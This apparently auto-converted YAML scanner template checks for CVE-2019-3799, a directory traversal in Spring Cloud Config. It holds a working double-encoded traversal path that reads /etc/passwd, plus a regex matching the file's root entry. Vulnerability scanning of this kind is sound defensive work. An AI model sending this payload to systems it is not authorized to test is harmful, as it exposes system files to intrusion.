id: yaml-poc-vmware-spring_cloud_config-directory_traversal-CVE-2019-3799
info:
  name: Yaml Poc Vmware Spring_Cloud_Config Directory_Traversal Cve 2019 3799
  author: converted
  severity: medium
  description: 'Converted from xpoc: yaml-poc-vmware-spring_cloud_config-directory_traversal-CVE-2019-3799'
  tags: spring,vmware,traversal,cve
  classification:
    cve-id: CVE-2019-3799
  reference:
  - https://github.com/mpgn/CVE-2019-3799
  - https://nvd.nist.gov/vuln/detail/CVE-2019-3799
  - https://packetstormsecurity.com/files/152685/Spring-Cloud-Config-2.1.x-Path-Traversal.html
  - https://pivotal.io/security/cve-2019-3799
  - https://vigilance.fr/vulnerability/Oracle-Communications-vulnerabilities-of-April-2022-38100
http:
- method: GET
  path:
  - /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
  - type: regex
    part: body
    regex:
    - 'root:[x*]:0:0:'
